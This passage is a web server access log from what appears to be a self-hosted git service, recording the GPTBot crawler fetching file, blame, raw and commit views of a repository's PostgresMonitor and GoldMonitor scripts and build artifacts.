Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:13:45:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 11000] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:45:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 11000] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:45:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10999] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:45:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/ReadMe.md" [Client 74.7.227.38] [Length 11982] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" +[17/Feb/2026:13:45:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/ReadMe.md" [Client 74.7.227.38] [Length 11980] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" +[17/Feb/2026:13:45:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 16190] [Gzip 5.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor" +[17/Feb/2026:13:45:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1069] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:13:45:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 13037] [Gzip 6.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:13:45:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:13:45:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 11160] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor" +[17/Feb/2026:13:45:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 10186] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +[17/Feb/2026:13:45:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 11008] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:13:45:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 3141] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:13:45:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 3636] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:13:45:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 48958] [Gzip 17.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:13:45:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 9542] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +[17/Feb/2026:13:45:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 10405] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/watchdog.py" +[17/Feb/2026:13:45:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 8598258] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +[17/Feb/2026:13:45:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 18351] [Gzip 11.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:13:45:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 22899] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:13:45:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 10185] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/BuildTip.txt" +[17/Feb/2026:13:45:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 9908] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/BuildTip.txt" +[17/Feb/2026:13:45:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 17181] [Gzip 9.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:13:45:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/ReadMe.md" [Client 74.7.227.38] [Length 1845] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/ReadMe.md" +[17/Feb/2026:13:45:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/ReadMe.md" [Client 74.7.227.38] [Length 1845] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/ReadMe.md" +[17/Feb/2026:13:45:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 12108] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor" +[17/Feb/2026:13:45:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 21223] [Gzip 10.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/watchdog.py" +[17/Feb/2026:13:45:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 4095] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/watchdog.py" +[17/Feb/2026:13:45:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 152] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/BuildTip.txt" +[17/Feb/2026:13:45:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.spec" [Client 74.7.227.38] [Length 12512] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" +[17/Feb/2026:13:45:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldSpotMonitor_Final.spec" [Client 74.7.227.38] [Length 12516] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" +[17/Feb/2026:13:45:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor0.py" [Client 74.7.227.38] [Length 16948] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor0.py" +[17/Feb/2026:13:45:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.py" [Client 74.7.227.38] [Length 20089] [Gzip 6.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" +[17/Feb/2026:13:45:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/ReadMe.md" [Client 74.7.227.38] [Length 9895] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/ReadMe.md" +[17/Feb/2026:13:45:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.spec" [Client 74.7.227.38] [Length 12512] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" +[17/Feb/2026:13:45:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor-VeryGood2.py" [Client 74.7.227.38] [Length 17278] [Gzip 8.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor-VeryGood2.py" +[17/Feb/2026:13:45:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 10373] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:13:45:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 949] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:13:45:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 12073] [Gzip 4.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:13:45:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.py" [Client 74.7.227.38] [Length 20089] [Gzip 6.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" +[17/Feb/2026:13:45:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.spec" [Client 74.7.227.38] [Length 9896] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.spec" +[17/Feb/2026:13:45:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldSpotMonitor_Final.spec" [Client 74.7.227.38] [Length 9902] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldSpotMonitor_Final.spec" +[17/Feb/2026:13:45:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor0.py" [Client 74.7.227.38] [Length 9864] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor0.py" +[17/Feb/2026:13:45:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.py" [Client 74.7.227.38] [Length 9899] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.py" +[17/Feb/2026:13:45:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.spec" [Client 74.7.227.38] [Length 11733] [Gzip 5.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.spec" +[17/Feb/2026:13:45:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.spec" [Client 74.7.227.38] [Length 11734] [Gzip 5.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.spec" +[17/Feb/2026:13:45:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.spec" [Client 74.7.227.38] [Length 9893] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.spec" +[17/Feb/2026:13:45:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/ReadMe.md" [Client 74.7.227.38] [Length 11947] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/ReadMe.md" +[17/Feb/2026:13:45:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 12074] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/ReadMe.txt" 